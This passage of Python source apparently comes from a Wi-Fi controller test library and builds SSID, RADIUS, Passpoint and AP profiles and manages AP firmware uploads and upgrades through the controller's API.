default_profile._details["rfConfigMap"]["is5GHzL"]["radioMode"] = 'modeAX'
default_profile._details["rfConfigMap"]["is5GHzU"]["radioMode"] = 'modeAX'
default_profile._details["rfConfigMap"]["is2dot4GHz"]["rf"] = profile_data["name"]
default_profile._details["rfConfigMap"]["is5GHz"]["rf"] = profile_data["name"]
default_profile._details["rfConfigMap"]["is5GHzL"]["rf"] = profile_data["name"]
default_profile._details["rfConfigMap"]["is5GHzU"]["rf"] = profile_data["name"]
default_profile._name = profile_data["name"]
for i in default_profile._details["rfConfigMap"]:
for j in profile_data:
if i == j:
for k in default_profile._details["rfConfigMap"][i]:
for l in profile_data[j]:
if l == k:
default_profile._details["rfConfigMap"][i][l] = profile_data[j][l]
profile = self.profile_client.create_profile(body=default_profile)
self.profile_creation_ids['rf'].append(profile._id)
return profile
"""
Method call: used to create an SSID profile with the given parameters (see the commented example below).
"""
# Open
def create_open_ssid_profile(self, profile_data=None):
self.sdk_client.refresh_instance()
try:
if profile_data is None:
return False
default_profile = self.default_profiles['ssid']
default_profile._details['appliedRadios'] = profile_data["appliedRadios"]
default_profile._name = profile_data['profile_name']
default_profile._details['ssid'] = profile_data['ssid_name']
default_profile._details['vlanId'] = profile_data['vlan']
default_profile._details['forwardMode'] = profile_data['mode']
default_profile._details['secureMode'] = 'open'
profile = self.profile_client.create_profile(body=default_profile)
profile_id = profile._id
self.profile_creation_ids['ssid'].append(profile_id)
self.profile_ids.append(profile_id)
self.profile_name_with_id[profile_data["ssid_name"]] = profile_id
except Exception as e:
print(e)
profile = "error"
return profile
# wpa personal
def create_wpa_ssid_profile(self, profile_data=None):
self.sdk_client.refresh_instance()
self.get_default_profiles()
try:
if profile_data is None:
return False
default_profile = self.default_profiles['ssid']
default_profile._details['appliedRadios'] = profile_data["appliedRadios"]
default_profile._name = profile_data['profile_name']
default_profile._details['vlanId'] = profile_data['vlan']
default_profile._details['ssid'] = profile_data['ssid_name']
default_profile._details['keyStr'] = profile_data['security_key']
default_profile._details['forwardMode'] = profile_data['mode']
default_profile._details['secureMode'] = 'wpaPSK'
profile = self.profile_client.create_profile(body=default_profile)
profile_id = profile._id
self.profile_creation_ids['ssid'].append(profile_id)
self.profile_ids.append(profile_id)
except Exception as e:
print(e)
profile = False
return profile
# wpa2 personal
def create_wpa2_personal_ssid_profile(self, profile_data=None):
self.sdk_client.refresh_instance()
try:
if profile_data is None:
return False
default_profile = self.default_profiles['ssid']
default_profile._details['appliedRadios'] = profile_data["appliedRadios"]
default_profile._name = profile_data['profile_name']
default_profile._details['vlanId'] = profile_data['vlan']
default_profile._details['ssid'] = profile_data['ssid_name']
default_profile._details['keyStr'] = profile_data['security_key']
default_profile._details['forwardMode'] = profile_data['mode']
default_profile._details['secureMode'] = 'wpa2OnlyPSK'
profile = self.profile_client.create_profile(body=default_profile)
profile_id = profile._id
self.profile_creation_ids['ssid'].append(profile_id)
self.profile_ids.append(profile_id)
except Exception as e:
print(e)
profile = False
return profile
# wpa3 personal
def create_wpa3_personal_ssid_profile(self, profile_data=None):
self.sdk_client.refresh_instance()
try:
if profile_data is None:
return False
default_profile = self.default_profiles['ssid']
default_profile._details['appliedRadios'] = profile_data["appliedRadios"]
default_profile._name = profile_data['profile_name']
default_profile._details['vlanId'] = profile_data['vlan']
default_profile._details['ssid'] = profile_data['ssid_name']
default_profile._details['keyStr'] = profile_data['security_key']
default_profile._details['forwardMode'] = profile_data['mode']
default_profile._details['secureMode'] = 'wpa3OnlySAE'
profile = self.profile_client.create_profile(body=default_profile)
profile_id = profile._id
self.profile_creation_ids['ssid'].append(profile_id)
self.profile_ids.append(profile_id)
except Exception as e:
print(e)
profile = False
return profile
# wpa3 personal mixed mode
def create_wpa3_personal_mixed_ssid_profile(self, profile_data=None):
self.sdk_client.refresh_instance()
try:
if profile_data is None:
return False
default_profile = self.default_profiles['ssid']
default_profile._details['appliedRadios'] = profile_data["appliedRadios"]
default_profile._name = profile_data['profile_name']
default_profile._details['vlanId'] = profile_data['vlan']
default_profile._details['ssid'] = profile_data['ssid_name']
default_profile._details['keyStr'] = profile_data['security_key']
default_profile._details['forwardMode'] = profile_data['mode']
default_profile._details['secureMode'] = 'wpa3MixedSAE'
profile = self.profile_client.create_profile(body=default_profile)
profile_id = profile._id
self.profile_creation_ids['ssid'].append(profile_id)
self.profile_ids.append(profile_id)
except Exception as e:
print(e)
profile = False
return profile
# wpa wpa2 personal mixed mode
def create_wpa_wpa2_personal_mixed_ssid_profile(self, profile_data=None):
self.sdk_client.refresh_instance()
try:
if profile_data is None:
return False
default_profile = self.default_profiles['ssid']
default_profile._details['appliedRadios'] = profile_data["appliedRadios"]
default_profile._name = profile_data['profile_name']
default_profile._details['vlanId'] = profile_data['vlan']
default_profile._details['ssid'] = profile_data['ssid_name']
default_profile._details['keyStr'] = profile_data['security_key']
default_profile._details['forwardMode'] = profile_data['mode']
default_profile._details['secureMode'] = 'wpa2PSK'
profile = self.profile_client.create_profile(body=default_profile)
profile_id = profile._id
self.profile_creation_ids['ssid'].append(profile_id)
self.profile_ids.append(profile_id)
except Exception as e:
print(e)
profile = False
return profile
# wpa enterprise done
def create_wpa_enterprise_ssid_profile(self, profile_data=None):
self.sdk_client.refresh_instance()
try:
if profile_data is None:
return False
default_profile = self.default_profiles['ssid']
default_profile._details['appliedRadios'] = profile_data["appliedRadios"]
default_profile._name = profile_data['profile_name']
default_profile._details['vlanId'] = profile_data['vlan']
default_profile._details['ssid'] = profile_data['ssid_name']
default_profile._details['forwardMode'] = profile_data['mode']
default_profile._details["radiusServiceId"] = self.profile_creation_ids["radius"][0]
default_profile._child_profile_ids = self.profile_creation_ids["radius"]
default_profile._details['secureMode'] = 'wpaRadius'
profile = self.profile_client.create_profile(body=default_profile)
profile_id = profile._id
self.profile_creation_ids['ssid'].append(profile_id)
self.profile_ids.append(profile_id)
except Exception as e:
print(e)
profile = False
return profile
# wpa wpa2 enterprise mixed mode done
def create_wpa_wpa2_enterprise_mixed_ssid_profile(self, profile_data=None):
self.sdk_client.refresh_instance()
try:
if profile_data is None:
return False
default_profile = self.default_profiles['ssid']
default_profile._details['appliedRadios'] = profile_data["appliedRadios"]
default_profile._name = profile_data['profile_name']
default_profile._details['vlanId'] = profile_data['vlan']
default_profile._details['ssid'] = profile_data['ssid_name']
default_profile._details['forwardMode'] = profile_data['mode']
default_profile._details["radiusServiceId"] = self.profile_creation_ids["radius"][0]
default_profile._child_profile_ids = self.profile_creation_ids["radius"]
default_profile._details['secureMode'] = 'wpa2Radius'
profile = self.profile_client.create_profile(body=default_profile)
profile_id = profile._id
self.profile_creation_ids['ssid'].append(profile_id)
self.profile_ids.append(profile_id)
except Exception as e:
print(e)
profile = False
return profile
# wpa2 enterprise mode ssid profile
def create_wpa2_enterprise_ssid_profile(self, profile_data=None):
self.sdk_client.refresh_instance()
try:
if profile_data is None:
return False
default_profile = self.default_profiles['ssid']
default_profile._details['appliedRadios'] = profile_data["appliedRadios"]
default_profile._name = profile_data['profile_name']
default_profile._details['vlanId'] = profile_data['vlan']
default_profile._details['ssid'] = profile_data['ssid_name']
default_profile._details['forwardMode'] = profile_data['mode']
default_profile._details["radiusServiceId"] = self.profile_creation_ids["radius"][0]
default_profile._child_profile_ids = self.profile_creation_ids["radius"]
default_profile._details['secureMode'] = 'wpa2OnlyRadius'
profile = self.profile_client.create_profile(body=default_profile)
profile_id = profile._id
self.profile_creation_ids['ssid'].append(profile_id)
self.profile_ids.append(profile_id)
except Exception as e:
print(e)
profile = False
return profile
# wpa3 enterprise mode
def create_wpa3_enterprise_ssid_profile(self, profile_data=None):
self.sdk_client.refresh_instance()
try:
if profile_data is None:
return False
default_profile = self.default_profiles['ssid']
default_profile._details['appliedRadios'] = profile_data["appliedRadios"]
default_profile._name = profile_data['profile_name']
default_profile._details['vlanId'] = profile_data['vlan']
default_profile._details['ssid'] = profile_data['ssid_name']
default_profile._details['forwardMode'] = profile_data['mode']
default_profile._details["radiusServiceId"] = self.profile_creation_ids["radius"][0]
default_profile._child_profile_ids = self.profile_creation_ids["radius"]
default_profile._details['secureMode'] = 'wpa3OnlyEAP'
profile = self.profile_client.create_profile(body=default_profile)
profile_id = profile._id
self.profile_creation_ids['ssid'].append(profile_id)
self.profile_ids.append(profile_id)
except Exception as e:
print(e)
profile = False
return profile
# wpa3 enterprise mixed mode done
def create_wpa3_enterprise_mixed_ssid_profile(self, profile_data=None):
self.sdk_client.refresh_instance()
try:
if profile_data is None:
return False
default_profile = self.default_profiles['ssid']
default_profile._details['appliedRadios'] = profile_data["appliedRadios"]
default_profile._name = profile_data['profile_name']
default_profile._details['vlanId'] = profile_data['vlan']
default_profile._details['ssid'] = profile_data['ssid_name']
default_profile._details['forwardMode'] = profile_data['mode']
default_profile._details["radiusServiceId"] = self.profile_creation_ids["radius"][0]
default_profile._child_profile_ids = self.profile_creation_ids["radius"]
default_profile._details['secureMode'] = 'wpa3MixedEAP'
profile = self.profile_client.create_profile(body=default_profile)
profile_id = profile._id
self.profile_creation_ids['ssid'].append(profile_id)
self.profile_ids.append(profile_id)
except Exception as e:
print(e)
profile = False
return profile
# wpa3 enterprise mixed mode done
def create_wep_ssid_profile(self, profile_data=None):
self.sdk_client.refresh_instance()
try:
if profile_data is None:
return False
default_profile = self.default_profiles['ssid']
default_profile._details['appliedRadios'] = profile_data["appliedRadios"]
default_profile._name = profile_data['profile_name']
default_profile._details['vlanId'] = profile_data['vlan']
default_profile._details['ssid'] = profile_data['ssid_name']
default_profile._details['forwardMode'] = profile_data['mode']
default_profile._details['secureMode'] = 'wep'
default_profile._details['wepConfig'] = {}
default_profile._details['wepConfig']["model_type"] = "WepConfiguration"
default_profile._details['wepConfig']["wepAuthType"] = "open"
default_profile._details['wepConfig']["primaryTxKeyId"] = profile_data["default_key_id"]
default_profile._details['wepConfig']["wepKeys"] = [{'model_type': 'WepKey',
'txKey': profile_data["wep_key"],
'txKeyConverted': None,
'txKeyType': 'wep64'},
{'model_type': 'WepKey',
'txKey': profile_data["wep_key"],
'txKeyConverted': None,
'txKeyType': 'wep64'},
{'model_type': 'WepKey',
'txKey': profile_data["wep_key"],
'txKeyConverted': None,
'txKeyType': 'wep64'},
{'model_type': 'WepKey',
'txKey': profile_data["wep_key"],
'txKeyConverted': None,
'txKeyType': 'wep64'}]
profile = self.profile_client.create_profile(body=default_profile)
profile_id = profile._id
self.profile_creation_ids['ssid'].append(profile_id)
self.profile_ids.append(profile_id)
except Exception as e:
print(e)
profile = False
return profile
def __get_boolean(self, flag):
return 'true' if flag in ["Enabled", "True"] else 'false'
# wpa eap general method
def __create_wpa_eap_passpoint_ssid_profiles(self, profile_data=None, secure_mode=None):
try:
if profile_data is None or secure_mode is None:
return False
default_profile = self.default_profiles["ssid"]
default_profile._details["appliedRadios"] = profile_data["appliedRadios"]
default_profile._name = profile_data["profile_name"]
default_profile._details["vlanId"] = profile_data["vlan"]
default_profile._details["ssid"] = profile_data["ssid_name"]
default_profile._details["forwardMode"] = profile_data["mode"]
default_profile._details["radiusServiceId"] = self.profile_creation_ids["radius"][0]
default_profile._child_profile_ids = self.profile_creation_ids["radius"]
default_profile._details["secureMode"] = secure_mode
profile = self.profile_client.create_profile(body=default_profile)
profile_id = profile._id
self.profile_creation_ids["ssid"].append(profile_id)
self.profile_ids.append(profile_id)
self.profile_name_with_id[profile_data["ssid_name"]] = profile_id
except Exception as e:
print(e)
profile = False
return profile
# wpa eap passpoint
def create_wpa_eap_passpoint_ssid_profile(self, profile_data=None):
if profile_data is None:
return False
return self.__create_wpa_eap_passpoint_ssid_profiles(profile_data, "wpaEAP")
# wpa2 eap passpoint
def create_wpa2_eap_passpoint_ssid_profile(self, profile_data=None):
if profile_data is None:
return False
return self.__create_wpa_eap_passpoint_ssid_profiles(profile_data, "wpa2EAP")
# wpa2only eap passpoint
def create_wpa2_only_eap_passpoint_ssid_profile(self, profile_data=None):
if profile_data is None:
return False
return self.__create_wpa_eap_passpoint_ssid_profiles(profile_data, "wpa2OnlyEAP")
# passpoint osu id provider profile
def create_passpoint_osu_id_provider_profile(self, profile_data=None):
try:
if profile_data is None:
return False
default_profile = dict()
default_profile["model_type"] = "Profile"
default_profile["customerId"] = self.sdk_client.customer_id
default_profile["profileType"] = "passpoint_osu_id_provider"
default_profile["name"] = profile_data["profile_name"]
details = dict()
details["model_type"] = "PasspointOsuProviderProfile"
mcc_mnc = dict()
if (profile_data["mcc"] and profile_data["mnc"]) is not None:
mcc_mnc = {"mcc": profile_data["mcc"], "mnc": profile_data["mnc"]}
if profile_data["network"] is not None:
mcc_mnc["network"] = profile_data["network"]
if mcc_mnc:
details["mccMncList"] = [mcc_mnc]
if (profile_data["mcc"] and profile_data["mnc"]) is not None:
details["mccMncList"] = [{"mcc": profile_data["mcc"], "mnc": profile_data["mnc"]}]
if profile_data["osu_nai_standalone"] is not None:
details["osuNaiStandalone"] = profile_data["osu_nai_standalone"]
if profile_data["osu_nai_shared"] is not None:
details["osuNaiShared"] = profile_data["osu_nai_shared"]
if profile_data["nai_realms"] is not None:
details["naiRealmList"] = [{"naiRealms": [profile_data["nai_realms"]["domain"]],
"encoding": profile_data["nai_realms"]["encoding"],
"eapMap": profile_data["nai_realms"]["eap_map"]
}]
details["roamingOi"] = profile_data["roaming_oi"]
default_profile['details'] = details
default_profile['childProfileIds'] = []
profile = self.profile_client.create_profile(body=default_profile)
profile_id = profile._id
self.profile_creation_ids["passpoint_osu_id_provider"].append(profile_id)
self.profile_ids.append(profile_id)
except Exception as e:
print(e)
profile = False
return profile
# passpoint operator profile
def create_passpoint_operator_profile(self, profile_data=None):
try:
if profile_data is None:
return False
default_profile = dict()
default_profile["model_type"] = "Profile"
default_profile["customerId"] = self.sdk_client.customer_id
default_profile["profileType"] = "passpoint_operator"
default_profile["name"] = profile_data["profile_name"]
default_profile["details"] = dict()
default_profile["details"]["model_type"] = "PasspointOperatorProfile"
default_profile["details"]["serverOnlyAuthenticatedL2EncryptionNetwork"] = \
self.__get_boolean(profile_data["osen"])
operator_names = []
operators = profile_data["operator_names"]
for operator in profile_data["operator_names"]:
operator_temp = dict()
for key in operator.keys():
if key == "name":
operator_temp["dupleName"] = operator["name"]
else:
operator_temp[key] = operator[key]
operator_names.append(operator_temp)
default_profile["details"]["operatorFriendlyName"] = operator_names
default_profile["details"]["domainNameList"] = profile_data["domain_name_list"]
default_profile["childProfileIds"] = []
profile = self.profile_client.create_profile(body=default_profile)
profile_id = profile._id
self.profile_creation_ids["passpoint_operator"].append(profile_id)
self.profile_ids.append(profile_id)
except Exception as e:
profile = False
return profile
# passpoint venue profile
def create_passpoint_venue_profile(self, profile_data=None):
try:
if profile_data is None:
return False
default_profile = dict()
default_profile["model_type"] = "Profile"
default_profile["customerId"] = self.sdk_client.customer_id
default_profile["profileType"] = "passpoint_venue"
default_profile["name"] = profile_data["profile_name"]
default_profile["details"] = dict()
default_profile["details"]["model_type"] = "PasspointVenueProfile"
venue_names = []
for venue in profile_data["venue_names"]:
venue_temp = dict()
for key in venue.keys():
if key == "name":
venue_temp["dupleName"] = venue["name"]
if key == "url":
venue_temp["venueUrl"] = venue["url"]
venue_names.append(venue_temp)
default_profile["details"]["venueNameSet"] = venue_names
allowed_venue_groups = {"Unspecified": 0, "Assembly": 1, "Business": 2, "Educational": 3,
"Factory and Industrial": 4, "Institutional": 5, "Mercantile": 6, "Residential": 7}
allowed_venue_types = {"Unspecified Assembly": 0, "Areana": 1, "Stadium": 2, "Passenger Terminal": 3,
"Amphitheatre": 4, "Amusement Park": 5, "Place of Worship": 6,
"Convention Center": 7,
"Library": 8, "Museum": 9, "Restaurant": 10, "Theatre": 11, "Bar": 12,
"Coffee Shop": 13,
"Zoo or Aquarium": 14, "Emergency Coordination Center": 15,
"Unspecified Business": 0, "Doctor or Dentist office": 1, "Bank": 2,
"Fire Station": 3,
"Police Station": 4, "Post Office": 5, "Professional Office": 6,
"Research and Development Facility": 7, "Attorney Office": 8,
"Unspecified Educational": 0, "School, Primary": 1, "School, Secondary": 2,
"University or College": 3, "Unspecified Factory and Industrial": 0, "Factory": 1,
"Unspecified Institutional": 0, "Hospital": 1, "Long-Term Care Facility": 2,
"Alcohol and Drug Re-habilitation Center": 3, "Group Home": 4, "Prison or Jail": 5,
"Unspecified Mercantile": 0, "Retail Store": 1, "Grocery Market": 2,
"Automotive Service Station": 3, "Shopping Mall": 4, "Gas Station": 5,
"Unspecified Residential": 0, "Pivate Residence": 1, "Hotel or Model": 2,
"Dormitory": 3, "Boarding House": 4}
default_profile["details"]["venueTypeAssignment"] = {"venueGroupId":
allowed_venue_groups[
profile_data["venue_type"]["group"]],
"venueTypeId":
allowed_venue_types[
profile_data["venue_type"]["type"]]}
default_profile["childProfileIds"] = []
profile = self.profile_client.create_profile(body=default_profile)
profile_id = profile._id
self.profile_creation_ids["passpoint_venue"].append(profile_id)
self.profile_ids.append(profile_id)
except Exception as e:
print(e)
profile = False
return profile
# passpoint profile
def create_passpoint_profile(self, profile_data=None):
try:
if profile_data is None:
return False
default_profile = dict()
default_profile["model_type"] = "Profile"
default_profile["customerId"] = self.sdk_client.customer_id
default_profile["profileType"] = "passpoint"
default_profile["name"] = profile_data["profile_name"]
default_profile["details"] = dict()
default_profile["details"]["model_type"] = "PasspointProfile"
default_profile["details"]["enableInterworkingAndHs20"] = self.__get_boolean(
profile_data["interworking_hs2dot0"])
if profile_data["hessid"] is not None:
default_profile["details"]["hessid"] = dict()
default_profile["details"]["hessid"]["addressAsString"] = profile_data["hessid"]
default_profile["details"]["passpointAccessNetworkType"] = \
profile_data["access_network"]["Access Network Type"].replace(' ', '_').lower()
default_profile["details"]["passpointNetworkAuthenticationType"] = \
profile_data["access_network"]["Authentication Type"].replace('&', 'and').replace(' ', '_').lower()
default_profile["details"]["emergencyServicesReachable"] = self.__get_boolean(
profile_data["access_network"][
"Emergency Services Reachable"])
default_profile["details"]["unauthenticatedEmergencyServiceAccessible"] = self.__get_boolean(
profile_data["access_network"][
"Unauthenticated Emergency Service"])
default_profile["details"]["internetConnectivity"] = self.__get_boolean(profile_data["ip_connectivity"][
"Internet Connectivity"])
capability_set = []
for cap in profile_data["ip_connectivity"]["Connection Capability"]:
capability_info = dict()
capability_info["connectionCapabilitiesPortNumber"] = cap["port"]
capability_info["connectionCapabilitiesIpProtocol"] = cap["protocol"]
capability_info["connectionCapabilitiesStatus"] = cap["status"]
capability_set.append(capability_info)
default_profile["details"]["connectionCapabilitySet"] = capability_set
default_profile["details"]["ipAddressTypeAvailability"] = profile_data["ip_connectivity"]["IP Address Type"]
allowed_gas_address_behavior = {"P2P Spec Workaround From Request": "p2pSpecWorkaroundFromRequest",
"forceNonCompliantBehaviourFromRequest": "forceNonCompliantBehaviourFromRequest",
"IEEE 80211 Standard Compliant Only": "ieee80211StandardCompliantOnly"}
default_profile["details"]["gasAddr3Behaviour"] = allowed_gas_address_behavior[
profile_data["ip_connectivity"]
["GAS Address 3 Behaviour"]]
default_profile["details"]["anqpDomainId"] = profile_data["ip_connectivity"]["ANQP Domain ID"]
default_profile["details"]["disableDownstreamGroupAddressedForwarding"] = self.__get_boolean(
profile_data["ip_connectivity"][
"Disable DGAF"])
default_profile["details"]["associatedAccessSsidProfileIds"] = profile_data["allowed_ssids"]
default_profile["details"]["passpointOperatorProfileId"] = self.profile_creation_ids["passpoint_operator"][0]
default_profile["details"]["passpointVenueProfileId"] = self.profile_creation_ids["passpoint_venue"][0]
default_profile["details"]["passpointOsuProviderProfileIds"] = self.profile_creation_ids[
"passpoint_osu_id_provider"]
default_profile["details"]["accessNetworkType"] = \
profile_data["access_network"]["Access Network Type"].replace(' ', '_').lower()
# osuSsidProfileId is needed for R2
default_profile["details"]["networkAuthenticationType"] = \
profile_data["access_network"]["Authentication Type"].replace('&', 'and').replace(' ', '_').lower()
default_profile["childProfileIds"] = self.profile_creation_ids["passpoint_venue"] + \
self.profile_creation_ids["passpoint_operator"] + \
self.profile_creation_ids["passpoint_osu_id_provider"]
profile = self.profile_client.create_profile(body=default_profile)
profile_id = profile._id
self.profile_creation_ids["passpoint"].append(profile_id)
self.profile_ids.append(profile_id)
except Exception as e:
print(e)
profile = False
return profile
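# create_passpoint_profile resolves its child profile ids from self.profile_creation_ids, so the
# operator, venue and OSU provider profiles must already have been created. An illustrative call
# order (the OSU helper name below is assumed; use whichever method fills
# profile_creation_ids["passpoint_osu_id_provider"]):
# profile.create_passpoint_operator_profile(profile_data=operator_data)
# profile.create_passpoint_venue_profile(profile_data=venue_data)
# profile.create_passpoint_osu_provider_profile(profile_data=osu_data)
# profile.create_passpoint_profile(profile_data=passpoint_data)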
"""
method call: used to create a ap profile that contains the given ssid profiles
"""
def set_ap_profile(self, profile_data=None):
self.sdk_client.refresh_instance()
if profile_data is None:
return False
default_profile = self.default_profiles['equipment_ap_2_radios']
default_profile._child_profile_ids = []
for i in self.profile_creation_ids:
if i not in ["ap", "passpoint_osu_id_provider", "passpoint_operator", "passpoint_venue", "passpoint",
"radius"]:
for j in self.profile_creation_ids[i]:
default_profile._child_profile_ids.append(j)
default_profile._name = profile_data['profile_name']
# print(default_profile)
default_profile = self.profile_client.create_profile(body=default_profile)
self.profile_creation_ids['ap'] = default_profile._id
self.profile_ids.append(default_profile._id)
return default_profile
"""
method call: used to create a ap profile that contains the given ssid profiles
"""
def set_ap_profile_custom(self, profile_data=None):
self.sdk_client.refresh_instance()
if profile_data is None:
return False
default_profile = self.default_profiles['equipment_ap_2_radios']
default_profile._child_profile_ids = []
for i in self.profile_creation_ids:
if i not in ["ap", "passpoint_osu_id_provider", "passpoint_operator", "passpoint_venue", "passpoint",
"radius", "ssid"]:
for j in self.profile_creation_ids[i]:
default_profile._child_profile_ids.append(j)
for ssid in profile_data["ssid_names"]:
default_profile._child_profile_ids.append(self.profile_name_with_id[ssid])
default_profile._name = profile_data['profile_name']
default_profile = self.profile_client.create_profile(body=default_profile)
self.profile_creation_ids['ap'] = default_profile._id
self.profile_ids.append(default_profile._id)
return default_profile
"""
method call: used to create a ap profile that contains the specific ssid profiles
"""
def update_ap_profile(self, profile_data=None):
self.sdk_client.refresh_instance()
if profile_data is None:
print("profile info is None, Please specify the profile info that you want to update")
return False
child_profiles_to_apply = []
try:
for ssid in profile_data["ssid_names"]:
child_profiles_to_apply.append(self.profile_name_with_id[ssid])
default_profile = self.get_profile_by_name(profile_name=profile_data["profile_name"])
for i in self.profile_creation_ids:
if i not in ["ap", "passpoint_osu_id_provider", "passpoint_operator", "passpoint_venue", "passpoint",
"radius", "ssid"]:
for j in self.profile_creation_ids[i]:
child_profiles_to_apply.append(j)
default_profile._child_profile_ids = child_profiles_to_apply
default_profile = self.profile_client.update_profile(default_profile)
return True
except Exception as e:
print(e)
return False
"""
method call: used to create a radius profile with the settings given
"""
def create_radius_profile(self, radius_info=None, radius_accounting_info=None):
self.sdk_client.refresh_instance()
default_profile = self.default_profiles['radius']
default_profile._name = radius_info['name']
default_profile._details['primaryRadiusAuthServer'] = {}
default_profile._details['primaryRadiusAuthServer']['ipAddress'] = radius_info['ip']
default_profile._details['primaryRadiusAuthServer']['port'] = radius_info['port']
default_profile._details['primaryRadiusAuthServer']['secret'] = radius_info['secret']
if radius_accounting_info is not None:
default_profile._details["primaryRadiusAccountingServer"] = {}
default_profile._details["primaryRadiusAccountingServer"]["ipAddress"] = radius_accounting_info["ip"]
default_profile._details["primaryRadiusAccountingServer"]["port"] = radius_accounting_info["port"]
default_profile._details["primaryRadiusAccountingServer"]["secret"] = radius_accounting_info["secret"]
default_profile = self.profile_client.create_profile(body=default_profile)
self.profile_creation_ids['radius'] = [default_profile._id]
self.profile_ids.append(default_profile._id)
return default_profile
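# Illustrative inputs for create_radius_profile; the addresses, ports and secret below are
# placeholders (1812/1813 are simply the conventional RADIUS auth/accounting ports):
# radius_info = {"name": "radius-profile-01", "ip": "192.168.1.10", "port": 1812, "secret": "testing123"}
# radius_accounting_info = {"ip": "192.168.1.10", "port": 1813, "secret": "testing123"}
# profile.create_radius_profile(radius_info, radius_accounting_info)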
"""
method to push the profile to the given equipment
"""
# Under a bug; deprecated until resolved. Intended to be the primary method once fixed
def push_profile(self, equipment_id=None):
self.sdk_client.refresh_instance()
pagination_context = """{
"model_type": "PaginationContext",
"maxItemsPerPage": 100
}"""
default_equipment_data = self.sdk_client.equipment_client.get_equipment_by_id(equipment_id=equipment_id, async_req=False)
# default_equipment_data._details[] = self.profile_creation_ids['ap']
# print(default_equipment_data)
# print(self.sdk_client.equipment_client.update_equipment(body=default_equipment_data, async_req=True))
"""
method to verify if the expected ssid's are loaded in the ap vif config
"""
def update_ssid_name(self, profile_name=None, new_profile_name=None):
self.sdk_client.refresh_instance()
if profile_name is None:
print("profile name is None, Please specify the ssid profile name that you want to modify")
return False
if new_profile_name is None:
print("Please specify the new name for ssid profile that you want to make to")
return False
try:
profile = self.get_profile_by_name(profile_name=profile_name)
profile._details['ssid'] = new_profile_name
self.profile_client.update_profile(profile)
return True
except Exception as e:
print(e)
return False
def update_ssid_profile(self, profile_info=None):
self.sdk_client.refresh_instance()
if profile_info is None:
print("profile info is None, Please specify the profile info that you want to update")
return False
try:
profile = self.get_profile_by_name(profile_name=profile_info["ssid_profile_name"])
profile._details["radiusServiceId"] = self.profile_creation_ids["radius"][0]
profile._child_profile_ids = self.profile_creation_ids["radius"] + self.profile_creation_ids["passpoint"]
if "radius_configuration" in profile_info.keys():
if "radius_acounting_service_interval" in profile_info["radius_configuration"].keys():
profile._details["radiusAcountingServiceInterval"] = profile_info["radius_configuration"]["radius_acounting_service_interval"]
if "user_defined_nas_id" in profile_info["radius_configuration"].keys():
profile._details["radiusClientConfiguration"]["userDefinedNasId"] = profile_info["radius_configuration"]["user_defined_nas_id"]
if "operator_id" in profile_info["radius_configuration"].keys():
profile._details["radiusClientConfiguration"]["operatorId"] = profile_info["radius_configuration"]["operator_id"]
self.profile_client.update_profile(profile)
return True
except Exception as e:
print(e)
return False
def clear_ssid_profile(self, profile_name=None):
if profile_name is None:
print("profile name is None, Please specify the ssid profile name that you want to update")
return False
try:
profile = self.get_profile_by_name(profile_name=profile_name)
profile._details["radiusServiceId"] = None
profile._child_profile_ids = []
self.profile_client.update_profile(profile)
return True
except Exception as e:
print(e)
return False
"""
method to delete a profile by its id
"""
def delete_profile(self, profile_id=None):
self.sdk_client.refresh_instance()
if profile_id is None:
return False
for i in profile_id:
self.profile_client.delete_profile(profile_id=i)
# To be deprecated in favour of push_profile once that method is fixed
def push_profile_old_method(self, equipment_id=None):
self.sdk_client.refresh_instance()
if equipment_id is None:
return 0
url = self.sdk_client.configuration.host + "/portal/equipment?equipmentId=" + str(equipment_id)
payload = {}
headers = self.sdk_client.configuration.api_key_prefix
response = requests.request("GET", url, headers=headers, data=payload)
equipment_info = response.json()
equipment_info['profileId'] = self.profile_creation_ids['ap']
url = self.sdk_client.configuration.host + "/portal/equipment"
headers = {
'Content-Type': 'application/json',
'Authorization': self.sdk_client.configuration.api_key_prefix['Authorization']
}
response = requests.request("PUT", url, headers=headers, data=json.dumps(equipment_info))
return response
"""
FirmwareUtility class
JFrog integration via the JfrogUtility base class is currently commented out
sdk_client [ Controller instance ]
controller_data [ sdk_base_url ] needed only if sdk_client is not passed
customer_id [ 2 ] needed only if sdk_client is not passed
model [ AP model name, used as the firmware modelId ]
version_url [ URL or path to the firmware image; its last path segment is used as the version name ]
"""
class FirmwareUtility:
def __init__(self,
sdk_client=None,
jfrog_credentials=None,
controller_data=None,
customer_id=2,
model=None,
version_url=None):
# super().__init__(credentials=jfrog_credentials)
if sdk_client is None:
sdk_client = Controller(controller_data=controller_data, customer_id=customer_id)
self.sdk_client = sdk_client
self.sdk_client.refresh_instance()
self.firmware_client = FirmwareManagementApi(api_client=sdk_client.api_client)
# self.jfrog_client = JFrogUtility(credentials=jfrog_credentials)
self.equipment_gateway_client = EquipmentGatewayApi(api_client=sdk_client.api_client)
self.model = model
self.fw_version = version_url
def get_fw_version(self):
fw_version = self.fw_version.split("/")[-1]
return fw_version
def upload_fw_on_cloud(self, force_upload=False):
self.sdk_client.refresh_instance()
fw_version = self.fw_version.split("/")[-1]
print("Upload fw version :", self.fw_version)
fw_id = self.is_fw_available(fw_version=fw_version)
if fw_id and not force_upload:
print("Skipping upload, Firmware Already Available", "Force Upload :", force_upload)
# Don't Upload the fw
return fw_id
else:
if fw_id and force_upload:
print("Firmware Version Already Available, Deleting and Uploading Again",
" Force Upload :", force_upload)
self.firmware_client.delete_firmware_version(firmware_version_id=fw_id)
print("Deleted Firmware Image from cloud, uploading again")
time.sleep(2)
# if force_upload is true and latest image available, then delete the image
firmware_data = {
"id": 0,
"equipmentType": "AP",
"modelId": str(self.model).upper(),
"versionName": fw_version,
"description": fw_version + " FW VERSION",
"filename": self.fw_version,
}
firmware_id = self.firmware_client.create_firmware_version(body=firmware_data)
print("Uploaded the Image: ", fw_version)
return firmware_id._id
def upgrade_fw(self, equipment_id=None, force_upgrade=False, force_upload=False):
self.sdk_client.refresh_instance()
if equipment_id is None:
print("No Equipment Id Given")
exit()
if (force_upgrade is True) or (self.should_upgrade_ap_fw(equipment_id=equipment_id)):
firmware_id = self.upload_fw_on_cloud(force_upload=force_upload)
time.sleep(5)
try:
obj = self.equipment_gateway_client.request_firmware_update(equipment_id=equipment_id,
firmware_version_id=firmware_id)
print("Request firmware upgrade Success! waiting for 300 sec")
time.sleep(400)
except Exception as e:
print(e)
obj = False
return obj
# Write the upgrade fw logic here
def should_upgrade_ap_fw(self, equipment_id=None):
self.sdk_client.refresh_instance()
current_fw = self.sdk_client.get_ap_firmware_old_method(equipment_id=equipment_id)
latest_fw = self.get_fw_version()
print(self.model, current_fw, latest_fw)
